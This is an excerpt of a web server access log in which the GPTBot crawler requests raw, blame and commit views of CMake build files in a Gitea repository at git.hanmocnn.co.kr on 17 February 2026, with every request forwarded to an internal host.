compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21732] [Gzip 28.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21733] [Gzip 28.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14030] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15262] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11185] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11490] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:25:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:25:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11164] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11186] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14030] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14031] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13299] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14253] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10524] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10006] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11120] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:25:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10087] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:25:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:25:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:25:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14031] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10091] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10266] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:25:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10266] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:25:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11488] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10092] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11166] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33373] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:16:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 